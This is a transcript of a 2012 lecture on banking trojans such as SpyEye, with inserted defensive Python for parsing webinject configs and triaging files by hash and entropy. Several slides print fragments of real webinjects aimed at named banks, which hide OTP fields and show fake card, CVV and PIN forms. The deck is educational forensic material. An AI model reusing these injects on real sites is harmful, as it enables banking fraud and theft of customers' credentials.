Banking Malware

Posted on 23-Feb-2016 (transcript of a PowerPoint presentation)

Banking Malware

INTRODUCTION TO CRIMEWARE IN THE BANKING SECTOR

PRESI NELLA RETE - COLLEGIO GHISLIERI, 23 NOVEMBER 2012

Dott. Francesco Schifilliti

WHAT IS A BANKING TROJAN? (slide 001)

This term refers to the subset of malware seeking to steal data from electronic bank accounts. Within this context, other financial services, such as online stock exchange operations, are also considered electronic banking.

Zeus, SpyEye… and many others (slide 002)

Zeus, SpyEye, Ares, Tatanga, Oddjob, Carberp, Zeus GameOver, Gataka, Shylock, Citadel, Cridex, Torpig

(Minimum) Parties Involved (slide 003)

CyberCrime Organization
Developers
Black Market
Money Mule / Pack Mule

Malware Development (slide 004)

CyberCrime Organization
Black Market (freelance developers)
Developers (affiliates)

Malware Distribution (slide 005)

Malware Authors
User?

Malware Distribution (slide 006)

Malware Authors
Pay-per-Install
Drive-by-Download
Exploit-as-a-Service

Pay-per-Install Cycle (slide 007)

Malware Authors
Kingpin
Exploit-as-a-Service

Infection and Control Phase (slide 008)

Exploit Pack
Compromised Web Site
Infection
Trojan Repository
Spam Mail

Iterating the infection process… (slide 009)

Flat Botnet
P2P Botnet

Infection Cycle of a Malware on the PC (slide 010)

1. Infection on disk (e.g. SpyEye copies the file C:\cleansweep.exe)
2. Making the MW 'persistent' (e.g. by modifying the registry)
3. Injection (generally into the Explorer process)
4. Extension of the injection (generally with userland hooking techniques)
5. Persistent connection to the C&C server

The Smell of $$$ (slide 011)

Diagram labels: C&C Server, User, data theft, data & session theft

Man in the Browser (slide 012)

Diagram labels: OS, Kernel-land, User-land

Anti-Detection/Deception Techniques, MW Code (slide 013)

Anti Memory
Anti Emulation
Anti Debugging
Anti Disassembler
Cryptography
Packing & Protecting
Obfuscation

Structure of SpyEye (slide 014)

Binary
Malware plugins: config.dat, ccgrabber, collectors, sock5, customconnector, webinjectors.txt
Packer
Obfuscation
Anti-Dbg
C&C

A small piece of a SpyEye 10.7 webinjector (slide 015)

[…]
set_url *meine.deutsche-bank.de/trxm/db/*european.transfer.enter.data* GP
data_before
<body
data_end
data_inject
 style="visibility:hidden"
data_end
data_after
 id=
data_end
data_before
</body>
data_end
data_inject
<script src='/error.html/trxm1/dbb.do?act=getall&domain=DB'></script><script src='/error.html/trxm1/dbcommon.js'></script><script src='/error.html/trxm1/dbsepa.js'></script><script>if (typeof _n_ck == "undefined"){document.body.style.visibility = 'visible';}</script>
data_end
data_after
</html>
data_end
[…]

A small piece of an ATS webinjector (slide 016)

[…]
set_url *commbank.com.au/netbank/UserMaintenance* GP
data_before
<h1 class="PageTitle">*My Q*</h1>
data_end
data_inject
<script language="javascript" type="text/javascript">
window.onload = function() {
  for (i = 0; i < document.links.length; i++)
    if (document.links[i].id != 'H_LogOffLink' &&
        document.links[i].id != 'ctl00_HeaderControl_LogOffLink')
      document.links[i].onclick = function() { return false; };
};
</script>
<script language="javascript" type="text/javascript">
var clck_counter = 0;
function msg() {
  clck_counter++;
  if (clck_counter == 2) {
    document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.visibility = "hidden";
    document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.display = "none";
    document.getElementById('ctl00_BodyPlaceHolder_btnGenSMS_field').disabled = true;
    document.getElementById('error').style.top = 42;
    document.getElementById('error').style.left = 42;
    document.getElementById('error').style.visibility = "visible";
    document.getElementById('error').style.display = "block";
  }
  return false;
}
[…]
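The two slides above show the layout of a webinjects-style configuration: a set_url line carrying a URL mask and flags, followed by one or more data_before / data_inject / data_after triples, each terminated by data_end. As an added example (not code from the slides or from the malware), here is a small Python parser for that layout, written from the analyst's side: given a recovered configuration it lists which URL masks are targeted, which flags apply, which external scripts the injected content loads, and which entries would fire on a given URL. The sample configuration, its hostnames and script paths are constructed placeholders; the reading of the flags G and P as "GET" and "POST" and the glob-style meaning of '*' in the mask are assumptions, not facts taken from the slides.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample in the set_url / data_before / data_inject / data_after /
# data_end layout shown on slides 015 and 016. Hostnames and script paths are
# placeholders, not values from the slides.
SAMPLE_WEBINJECTS = """\
set_url *onlinebanking.example.com/transfer* GP
data_before
<body
data_end
data_inject
 style="visibility:hidden"
data_end
data_after
 id=
data_end
data_before
</body>
data_end
data_inject
<script src='/error.html/inj/common.js'></script>
<script src='https://cdn.example.net/ats.js'></script>
data_end
data_after
</html>
data_end

set_url *cards.example.org/cardSummary* G
data_before
<h1 class="PageTitle">
data_end
data_inject
<div id="inject">Please confirm your card details</div>
data_end
data_after
</h1>
data_end
"""

# Assumption: the set_url flags G and P are read as "apply on GET" / "apply on
# POST"; any other letter is reported as unknown rather than guessed.
FLAG_MEANINGS = {"G": "GET", "P": "POST"}
SECTION_KEYS = {"data_before": "before", "data_inject": "inject", "data_after": "after"}


@dataclass
class Injection:
    before: str = ""   # HTML fragment marking where the injection starts
    inject: str = ""   # content inserted between 'before' and 'after'
    after: str = ""    # HTML fragment marking where the injection ends


@dataclass
class Target:
    url_mask: str
    flags: str
    injections: List[Injection] = field(default_factory=list)


def parse_webinjects(text: str) -> List[Target]:
    """Parse a webinjects-style config; raises ValueError on a block without data_end."""
    targets: List[Target] = []
    target: Optional[Target] = None
    current: Optional[Injection] = None
    section: Optional[str] = None
    buf: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if section is not None:                       # inside a data_* ... data_end block
            if line == "data_end":
                setattr(current, section, "\n".join(buf))
                if section == "after":                # an 'after' block completes one triple
                    current = None
                section, buf = None, []
            else:
                buf.append(raw)                       # keep leading spaces: ' style=' matters
            continue
        if not line:
            continue
        if line.startswith("set_url"):
            parts = line.split()
            target = Target(url_mask=parts[1] if len(parts) > 1 else "",
                            flags=parts[2] if len(parts) > 2 else "")
            targets.append(target)
            current = None
        elif line in SECTION_KEYS:
            if target is None:
                raise ValueError(f"{line} before any set_url")
            if current is None:
                current = Injection()
                target.injections.append(current)
            section = SECTION_KEYS[line]
        # any other directive is ignored by this minimal parser
    if section is not None:
        raise ValueError(f"unterminated data_{section} block")
    return targets


def url_is_targeted(mask: str, url: str) -> bool:
    """Match a URL against a set_url mask, treating '*' as a wildcard (assumed glob semantics)."""
    pattern = ".*".join(re.escape(part) for part in mask.split("*"))
    return re.fullmatch(pattern, url, re.IGNORECASE) is not None


def external_scripts(target: Target) -> List[str]:
    """Script src values pulled in by the injected content: the first thing to block or hunt for."""
    srcs: List[str] = []
    for inj in target.injections:
        srcs += re.findall(r"<script\b[^>]*\bsrc=['\"]([^'\"]+)['\"]", inj.inject, re.I)
    return srcs


def describe_flags(flags: str) -> List[str]:
    return [FLAG_MEANINGS.get(ch, f"unknown({ch})") for ch in flags]


def targets_for_url(text: str, url: str) -> List[Target]:
    """Entries of a config that would fire on the given URL."""
    return [t for t in parse_webinjects(text) if url_is_targeted(t.url_mask, url)]


if __name__ == "__main__":
    for t in parse_webinjects(SAMPLE_WEBINJECTS):
        print(t.url_mask, describe_flags(t.flags), len(t.injections), "block(s)")
        for src in external_scripts(t):
            print("   loads:", src)
```

Running the block prints one line per set_url entry with its decoded flags and the scripts it loads; targets_for_url answers the question a responder actually has when a config is recovered from a host, namely whether a given bank's URL is in scope for that sample.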

Webinject in cleartext in RAM (slide 017)

https://bcol.barclaycard.co.uk*cardSummary*
[non-printable memory bytes]
<style type="text/css">#inject { display: none; }.ui-dialog { width: 400px; font-size: 11px; }.ui-dialog .ui-dialog-titlebar-close { visibility: hidden; }.ui-dialog .ui-dialog-titlebar { visibility: hidden; display: none; }</style>
[non-printable memory bytes]
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script>
[…]
value=unescape(document.cookie.substring(offset, end))
[…]
jQuery("#inject_cc").focus();
} else if (jQuery("#inject_expdate_mm").val().length < 2) {
  alert('Please enter Exp.Date'); jQuery("#inject_expdate_mm").focus();
} else if (jQuery("#inject_expdate_yy").val().length < 2) {
  alert('Please enter Exp.Date'); jQuery("#inject_expdate_yy").focus();
} else if (jQuery("#inject_cvv").val().length < 3) {
  alert('Please enter correct CVV'); jQuery("#inject_cvv").focus();
} else if (jQuery("#inject_pin").val().length < 5) {
[…]

SpyEye: an example of modular and parametric MW (slide 018)

Diagram labels: C&C Server, User, Collector, Collector, Collector

What / how to steal is defined by the plugins installed on the bot:
billinghammer.dll_5f00ca74679332c15ebe2e682a19e8c9
bugreport.dll_a6c1992119c1550db437aac86d4ffdad
ccgrabber.dll_5b1593855a6e8f01468878eb88be39df
creditgrab.dll_0e0c1855fa82ca3ad20bbe30106657b2
ffcertgrabber.dll_6b5ffc56cec8f60a448fe7a9044625a5
Plugin_CreditGrab.dll_0e0c1855fa82ca3ad20bbe30106657b2
rdp.dll_0cb722049e024f2366ba9c187cb3929f
ddos.dll_716d82810241daa5e2a41327014e9a77
…

…on which bank / financial institution to carry out fraudulent operations is defined in webinjectors.txt

To whom the data collected by the MW is transmitted is defined in collectors.txt

A Reference Schema for the Analysis (slide 019)

Forensic Analysis: Disk Analysis, MW Searching, Reg. Analysis, Browser Analysis, File Analysis, Hash Comparing, Entropy Analysis

MW Analysis: De-Anti-XYZ, Disassembling, Debugging, Memory Dumping

Live Analysis: Network Analysis, Memory Analysis

FULL UNDERSTANDING OF THE FORENSIC ARTIFACT
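As an added example (not from the slides), here is a small triage routine for the "Hash Comparing" and "Entropy Analysis" steps of the forensic schema above. The known-hash table is built from the plugin names and MD5s listed on slide 018, so a file image whose MD5 matches is reported as that plugin; Shannon entropy is computed over the whole image and per 256-byte chunk, so that a packed or encrypted region (the "Packing & Protecting" and "Cryptography" techniques of slide 013) can be localised inside an otherwise plain file. The sample byte buffers are constructed, and the 7.0 bits-per-byte threshold for "likely packed" is an assumption (a common rule of thumb), not a value from the slides.

```python
import hashlib
import math
from collections import Counter

# SpyEye plugin MD5s as listed on slide 018 (MD5 -> plugin file name).
KNOWN_SPYEYE_PLUGIN_MD5 = {
    "5f00ca74679332c15ebe2e682a19e8c9": "billinghammer.dll",
    "a6c1992119c1550db437aac86d4ffdad": "bugreport.dll",
    "5b1593855a6e8f01468878eb88be39df": "ccgrabber.dll",
    "0e0c1855fa82ca3ad20bbe30106657b2": "creditgrab.dll / Plugin_CreditGrab.dll",
    "6b5ffc56cec8f60a448fe7a9044625a5": "ffcertgrabber.dll",
    "0cb722049e024f2366ba9c187cb3929f": "rdp.dll",
    "716d82810241daa5e2a41327014e9a77": "ddos.dll",
}

# Assumption: data at or above this many bits of entropy per byte is treated as
# packed/encrypted. A rule of thumb, not a value from the slides.
PACKED_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def chunk_entropy(data: bytes, chunk: int = 256) -> list:
    """Entropy per fixed-size chunk, to localise a packed region inside a file."""
    return [shannon_entropy(data[i:i + chunk]) for i in range(0, len(data), chunk)]


def triage(data: bytes, known: dict = KNOWN_SPYEYE_PLUGIN_MD5,
           threshold: float = PACKED_THRESHOLD) -> dict:
    """Hash comparing plus entropy analysis for one file image."""
    md5 = hashlib.md5(data).hexdigest()
    per_chunk = chunk_entropy(data)
    overall = shannon_entropy(data)
    return {
        "md5": md5,
        "sha256": hashlib.sha256(data).hexdigest(),
        "known_plugin": known.get(md5),           # None when the hash is not in the table
        "entropy": overall,
        "max_chunk_entropy": max(per_chunk, default=0.0),
        "likely_packed": overall >= threshold,
        "high_entropy_chunks": [i for i, e in enumerate(per_chunk) if e >= threshold],
    }


# Constructed sample buffers (not real malware): a plain-text-like file, a
# uniformly distributed buffer standing in for a packed section, and a file
# with a low-entropy header followed by a packed body.
PLAINTEXT_LIKE = b"This program cannot be run in DOS mode.\r\n" * 50
PACKED_LIKE = bytes(range(256)) * 8
MIXED = PLAINTEXT_LIKE[:512] + PACKED_LIKE


if __name__ == "__main__":
    for name, buf in (("plaintext", PLAINTEXT_LIKE), ("packed", PACKED_LIKE), ("mixed", MIXED)):
        r = triage(buf)
        print(f"{name:10} md5={r['md5']} entropy={r['entropy']:.2f} "
              f"packed={r['likely_packed']} known={r['known_plugin']} "
              f"high_chunks={r['high_entropy_chunks']}")
```

On a real acquisition the same routine would be run over each file flagged by the "MW Searching" step; a hash hit identifies a known plugin outright, while the per-chunk entropy list points at the region to unpack before disassembling or debugging.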

THANK YOU

Francesco Schifilliti

fschifilliti@forensictech.it